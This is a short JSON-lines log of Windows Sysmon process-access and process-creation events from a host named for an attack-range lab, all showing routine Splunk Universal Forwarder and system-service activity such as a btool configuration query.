{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2989,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2990,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00105B0D0500}\r\nTargetProcessId: 5056\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00105B0D0500}","TargetProcessId":"5056","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2991,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.257\r\nProcessGuid: {A837DB8D-0238-5F25-0000-00101C0E0500}\r\nProcessId: 5020\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list httpServer --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-0238-5F25-0000-00105B0D0500}\r\nParentProcessId: 5056\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list httpServer --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.257","ProcessGuid":"{A837DB8D-0238-5F25-0000-00101C0E0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list httpServer --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-0238-5F25-0000-00105B0D0500}","ParentProcessId":"5056","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list httpServer --no-log","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2992,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-0238-5F25-0000-00105B0D0500}\r\nSourceProcessId: 5056\r\nSourceThreadId: 5048\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00101C0E0500}\r\nTargetProcessId: 5020\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-0238-5F25-0000-00105B0D0500}","SourceProcessId":"5056","SourceThreadId":"5048","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00101C0E0500}","TargetProcessId":"5020","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2993,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2994,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00101C0E0500}\r\nTargetProcessId: 5020\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00101C0E0500}","TargetProcessId":"5020","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2995,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2996,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2997,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:40.245\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:40.245","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
